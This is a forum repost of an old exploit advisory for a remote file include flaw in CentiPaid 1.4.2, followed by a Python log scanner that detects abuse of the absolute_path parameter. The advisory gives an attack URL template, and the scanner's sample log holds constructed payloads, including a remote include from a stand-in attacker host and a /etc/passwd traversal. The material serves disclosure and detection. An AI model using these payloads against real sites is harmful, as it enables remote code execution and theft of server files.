Guest Nemessis
Posted April 26, 2008

http://www.milw0rm.com/exploits/2555

---------------------------------------------------------------------------
CentiPaid <= 1.4.2 [absolute_path] Remote File Include Vulnerability
---------------------------------------------------------------------------
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous
---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : CentiPaid
version : 1.4.2
URL : http://www.centipaid.com/centi/download/centipaid_php-1.4.2.tar.gz
------------------------------------------------------------------
Exploit:
~~~~~~~~
Variable $absolute_path not sanitized.
When register_globals=on, an attacker can exploit this vulnerability with a simple PHP injection script.

# http://www.site.com/[path]/centipaid_class.php?absolute_path=[Evil_Script]
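As an added detection example (not part of the original post or the CentiPaid code), the following scans web-server access logs for requests that hand centipaid_class.php an `absolute_path` parameter, which a legitimate client never needs to send; it also flags local-include attempts, a generalization of the remote case the advisory describes. The log lines, client addresses and hostnames are constructed.

```python
"""Flag requests that supply the absolute_path parameter to centipaid_class.php
(the RFI in the advisory above). Added example, not project code; all sample
data below is constructed."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style log lines, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Apr/2008:10:00:01 +0000] "GET /shop/index.php HTTP/1.1" 200 512
10.0.0.6 - - [26/Apr/2008:10:00:02 +0000] "GET /shop/centipaid_class.php?absolute_path=http://evil.example/x.txt? HTTP/1.1" 200 2048
10.0.0.7 - - [26/Apr/2008:10:00:03 +0000] "GET /shop/centipaid_class.php?absolute_path=../../../../etc/passwd%00 HTTP/1.1" 200 1024
10.0.0.8 - - [26/Apr/2008:10:00:04 +0000] "GET /shop/centipaid_class.php HTTP/1.1" 200 300
"""

# client, method, request target, status code
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) HTTP/[\d.]+" (\d{3})')
# Any URL scheme (http://, ftp://, data:// ...) means PHP would fetch the include remotely.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)

def classify(value):
    """Describe why a decoded absolute_path value is suspicious."""
    if SCHEME_RE.match(value):
        return "remote include (URL scheme)"
    if "\x00" in value or ".." in value:
        return "local include (traversal or null byte)"
    # The parameter is meant to be set server-side; any client-supplied value is noteworthy.
    return "absolute_path supplied by client"

def scan_log(text):
    """Return (client_ip, status, reason, decoded_value) for each matching request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/centipaid_class.php"):
            continue
        # parse_qs percent-decodes, so %00 becomes a real null byte here.
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("absolute_path", []):
            hits.append((ip, int(status), classify(value), value))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request is the case to investigate first, since it suggests the include succeeded rather than failing on a missing file.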